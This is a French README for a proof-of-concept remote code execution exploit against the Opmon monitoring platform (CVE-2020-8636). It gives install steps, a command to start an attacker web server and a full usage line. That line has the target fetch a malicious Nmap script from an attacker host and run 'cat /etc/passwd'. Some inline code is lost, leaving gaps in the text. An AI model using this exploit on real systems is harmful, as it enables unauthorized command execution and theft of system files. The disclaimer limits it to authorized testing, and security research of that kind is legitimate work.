
CVE-2020-8636 exploit d'exécution de code à distance authentifié pour Opmon
À propos • Installation • Utilisation • Licence
OpMonster est un exploit proof-of-concept pour CVE-2020-8636, une vulnérabilité d'exécution de code à distance dans la plateforme de surveillance Opmon. Il abuse du point de terminaison nettools.php, qui permet d'exécuter Nmap avec des options arbitraires. L'exploit fait récupérer par Opmon un script Nmap malveillant depuis un serveur que vous contrôlez (via ), le place dans , puis l'exécute pour lancer votre commande sur la cible et affiche la sortie.
--script.nsehttp-fetch/tmpDécouvert et développé par @phor3nsic. Plus de détails : Trois CVE sur Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
D'abord, démarrez un serveur web sur un hôte accessible par la cible, dans un répertoire où le script .nse généré peut être téléchargé (l'exploit écrit le script dans le répertoire courant) :
php -S 0.0.0.0:1337
Ensuite, exécutez l'exploit avec quatre arguments positionnels :
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
| Argument | Description |
|---|---|
HOST | URL de base Opmon cible (ex. https://vulnhost.com) |
LHOST | Hôte de votre serveur qui sert le script .nse |
LPORT | Port de votre serveur |
CMD | Commande à exécuter sur la cible |
L'exploit s'arrête avec un message si la cible ne télécharge pas le script (« non vulnérable ») ou ne peut pas établir une connexion sortante vers votre serveur.
Pour des tests de sécurité autorisés et à des fins éducatives uniquement. Vous êtes responsable de l'utilisation que vous en faites.